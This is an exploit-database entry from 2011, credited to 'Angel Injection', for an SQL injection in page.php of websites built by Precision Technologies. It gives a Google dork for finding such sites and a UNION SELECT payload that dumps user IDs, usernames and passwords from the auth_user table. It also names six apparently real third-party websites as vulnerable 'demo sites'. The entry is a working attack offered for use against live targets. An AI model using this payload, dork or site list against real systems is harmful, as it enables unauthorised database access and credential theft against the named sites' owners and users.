Precision Technologies(page.php)sql Injection Vulnerability

2011-08-17T00:00:00
ID 1337DAY-ID-16702
Type zdt
Reporter Angel Injection
Modified 2011-08-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability
# Date: 17/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.pretechno.com
# Version: N/A
# Category:: webapps
# Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id="
# Tested on: Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit

http://localhost/page.php?id=1'

http://localhost/page.php?id=1[injection here]

http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--

Demo sites
http://www.cibmrd.com/page.php?id=%27
http://www.nirmaltours.com/page.php?id=1%27
http://prakritiwomen.org/page.php?id=1
http://www.cardicareaipc.com/page.php?id=1%27
http://www.opaquegroup.com/page.php?id=1%27
http://synergy-pune.com/page.php?id=1%27


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2018-01-02]  #